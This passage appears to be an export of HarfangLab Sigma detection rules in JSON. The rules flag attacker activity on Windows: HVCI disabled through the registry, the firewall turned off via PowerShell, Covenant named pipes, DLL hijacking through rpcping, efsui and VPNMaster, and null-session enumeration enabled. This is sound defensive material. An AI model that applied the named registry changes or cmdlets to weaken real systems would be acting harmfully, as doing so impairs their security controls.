"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76107997-084f-46ed-aae8-41ca44b17c7c",
"rule_name": "Scheduled Task Created in Temporary Directory",
"rule_description": "Detects a scheduled task created from a temporary directory.\nAdversaries may abuse the Windows Task Scheduler for persistence or privilege escalation.\nIt is recommended to investigate the parent process of schtasks to look for malicious content or actions, as well as the target of the scheduled task to determine whether it is legitimate.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "762a46ad-3553-4544-ba6e-8b0d13b449c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621430Z",
"creation_date": "2026-03-23T11:45:34.621432Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621436Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_hvci.yml",
"content": "title: HVCI Driver Blocking Disabled\nid: 762a46ad-3553-4544-ba6e-8b0d13b449c3\ndescription: |\n Detects the HVCI (Hypervisor Enforced Code Integrity) being disabled via registry.\n HVCI is a Windows mechanism that allows blocking of known vulnerable or malicious drivers.\n Once HVCI is disabled, the attacker can proceed to a BYOVD (Bring Your Own Vulnerable Driver) attack.\n It is recommended to investigate the detected process, as well as to look for malicious drivers being loaded after this event.\nreferences:\n - https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/\n - https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/06/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "762a46ad-3553-4544-ba6e-8b0d13b449c3",
"rule_name": "HVCI Driver Blocking Disabled",
"rule_description": "Detects the HVCI (Hypervisor Enforced Code Integrity) being disabled via registry.\nHVCI is a Windows mechanism that allows blocking of known vulnerable or malicious drivers.\nOnce HVCI is disabled, the attacker can proceed to a BYOVD (Bring Your Own Vulnerable Driver) attack.\nIt is recommended to investigate the detected process, as well as to look for malicious drivers being loaded after this event.\n",
"rule_creation_date": "2023-06-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7632dbf3-3ad5-4d8a-9ba4-e6a6b78c80fa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084692Z",
"creation_date": "2026-03-23T11:45:34.084694Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084698Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/staatsgeheim/status/1868032068892184639",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_enter_pshostsession.yml",
"content": "title: PowerShell Session Hijacked via Enter-PSHostProcess\nid: 7632dbf3-3ad5-4d8a-9ba4-e6a6b78c80fa\ndescription: |\n Detects the execution of the Enter-PSHostProcess cmdlet that allows PowerShell commands to run within the context of a specific process.\n Enter-PSHostProcess is a PowerShell cmdlet that enables administrators to attach to and execute commands within running processes.\n Attackers can abuse this functionality to hijack legitimate processes, execute malicious code with elevated privileges, or blend their activities with normal system processes to evade detection.\n It is recommended to investigate the target process that was accessed, review any PowerShell commands executed within that process context and verify the legitimacy of the user account that initiated the session.\nreferences:\n - https://x.com/staatsgeheim/status/1868032068892184639\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/12/17\nmodified: 2025/06/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ScriptBlockText|contains: 'Enter-PSHostProcess'\n\n exclusion_program_files:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7632dbf3-3ad5-4d8a-9ba4-e6a6b78c80fa",
"rule_name": "PowerShell Session Hijacked via Enter-PSHostProcess",
"rule_description": "Detects the execution of the Enter-PSHostProcess cmdlet that allows PowerShell commands to run within the context of a specific process.\nEnter-PSHostProcess is a PowerShell cmdlet that enables administrators to attach to and execute commands within running processes.\nAttackers can abuse this functionality to hijack legitimate processes, execute malicious code with elevated privileges, or blend their activities with normal system processes to evade detection.\nIt is recommended to investigate the target process that was accessed, review any PowerShell commands executed within that process context and verify the legitimacy of the user account that initiated the session.\n",
"rule_creation_date": "2024-12-17",
"rule_modified_date": "2025-06-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "764f5854-46df-4319-bb1f-77f39a4207ad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080323Z",
"creation_date": "2026-03-23T11:45:34.080325Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080329Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
"https://attack.mitre.org/techniques/T1562/004/"
],
"name": "t1562_004_powershell_disable_firewall_script.yml",
"content": "title: Windows Firewall Disabled via PowerShell\nid: 764f5854-46df-4319-bb1f-77f39a4207ad\ndescription: |\n Detects a PowerShell commandlet used to disable the Windows firewall.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n It is recommended to investigate the parent process to determine the legitimacy of this action.\nreferences:\n - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\n - https://attack.mitre.org/techniques/T1562/004/\ndate: 2022/05/04\nmodified: 2025/11/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'Set-NetFirewallProfile'\n - '-Profile'\n - '-Enabled'\n - 'False'\n\n exclusion_defender:\n - PowershellCommand|contains: 'return (Get-Item \"Function:\\Set-NetFirewallProfile\")'\n - PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1'\n - ProcessCommandLine|contains: 'Get-FileHash ??:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\AntiVirus.psm1? -Algorithm SHA256;'\n\n exclusion_cyberwatch:\n ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_cockpit:\n ProcessImage: '?:\\Program Files (x86)\\Philips Healthcare\\Cockpit\\SysCheck.UI.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Windows\\CCM\\TSMBootstrap.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "764f5854-46df-4319-bb1f-77f39a4207ad",
"rule_name": "Windows Firewall Disabled via PowerShell",
"rule_description": "Detects a PowerShell commandlet used to disable the Windows firewall.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nIt is recommended to investigate the parent process to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-05-04",
"rule_modified_date": "2025-11-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76529836-bb7a-4a8e-8d1e-611c2d932858",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072443Z",
"creation_date": "2026-03-23T11:45:34.072445Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072449Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://riccardoancarani.github.io/2019-10-19-hunting-covenant-msbuild/",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_default_covenant_named_pipes_connection.yml",
"content": "title: Default Covenant Named Pipe Connected\nid: 76529836-bb7a-4a8e-8d1e-611c2d932858\ndescription: |\n Detects the connection to a named pipe pertaining to Covenant.\n Covenant uses Named Pipes mainly to self-replicate using SMB.\n It is recommended to analyze the process responsible for the named pipe creation to determine its legitimacy and to look for subsequent malicious actions executed on the host.\nreferences:\n - https://riccardoancarani.github.io/2019-10-19-hunting-covenant-msbuild/\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2025/04/10\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n # Endswith here allows us to match pipes that are prefixed\n # with hosts\n PipeName|endswith: '\\gruntsvc'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76529836-bb7a-4a8e-8d1e-611c2d932858",
"rule_name": "Default Covenant Named Pipe Connected",
"rule_description": "Detects the connection to a named pipe pertaining to Covenant.\nCovenant uses Named Pipes mainly to self-replicate using SMB.\nIt is recommended to analyze the process responsible for the named pipe creation to determine its legitimacy and to look for subsequent malicious actions executed on the host.\n",
"rule_creation_date": "2025-04-10",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76548890-65e4-488f-b856-88484015c9ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618769Z",
"creation_date": "2026-03-23T11:45:34.618771Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618775Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rpcping.yml",
"content": "title: DLL Hijacking via rpcping.exe\nid: 76548890-65e4-488f-b856-88484015c9ed\ndescription: |\n Detects potential Windows DLL Hijacking via rpcping.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rpcping.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\mswsock.dll'\n - '\\SspiCli.dll'\n - '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76548890-65e4-488f-b856-88484015c9ed",
"rule_name": "DLL Hijacking via rpcping.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rpcping.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76696bce-2f0c-4731-80e0-443f0830a20f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622866Z",
"creation_date": "2026-03-23T11:45:34.622868Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622888Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blumira.com/integration/how-to-disable-null-session-in-windows/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1087_001_restrictanonymoussam_key_in_registry.yml",
"content": "title: Account Enumeration Security Lowered in Registry\nid: 76696bce-2f0c-4731-80e0-443f0830a20f\ndescription: |\n Detects the modification of the Lsa Registry configuration allowing for Null Sessions to enumerate all usernames.\n This information can help adversaries determine which accounts exist to aid in follow-on behavior.\n It is recommended to analyze the process that modified the registry to look for malicious behavior or content.\nreferences:\n - https://www.blumira.com/integration/how-to-disable-null-session-in-windows/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\RestrictAnonymousSAM'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76696bce-2f0c-4731-80e0-443f0830a20f",
"rule_name": "Account Enumeration Security Lowered in Registry",
"rule_description": "Detects the modification of the Lsa Registry configuration allowing for Null Sessions to enumerate all usernames.\nThis information can help adversaries determine which accounts exist to aid in follow-on behavior.\nIt is recommended to analyze the process that modified the registry to look for malicious behavior or content.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.001",
"attack.t1112",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76938512-d1f1-49db-bcab-466da8afd029",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098769Z",
"creation_date": "2026-03-23T11:45:34.098771Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098775Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims",
"https://www.contextis.com/en/blog/dll-search-order-hijacking",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mastervpn.yml",
"content": "title: DLL Hijacking via VPNMaster software\nid: 76938512-d1f1-49db-bcab-466da8afd029\ndescription: |\n Detects potential Windows DLL Hijacking via VPNMaster software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims\n - https://www.contextis.com/en/blog/dll-search-order-hijacking\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'master_vpn-service.exe'\n ProcessSignature: 'INNOVATIVE CONNECTING PTE. LIMITED'\n ImageLoaded|endswith: '\\breakpad.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\VPNMaster\\'\n - '?:\\Program Files (x86)\\VPNMaster\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\VPNMaster\\'\n - '?:\\Program Files (x86)\\VPNMaster\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'INNOVATIVE CONNECTING PTE. LIMITED'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76938512-d1f1-49db-bcab-466da8afd029",
"rule_name": "DLL Hijacking via VPNMaster software",
"rule_description": "Detects potential Windows DLL Hijacking via VPNMaster software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76a53c24-d9cc-4c99-92e0-6e30c597bd9e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590302Z",
"creation_date": "2026-03-23T11:45:34.590308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590320Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_efsui.yml",
"content": "title: DLL Hijacking via efsui.exe\nid: 76a53c24-d9cc-4c99-92e0-6e30c597bd9e\ndescription: |\n Detects potential Windows DLL Hijacking via efsui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n 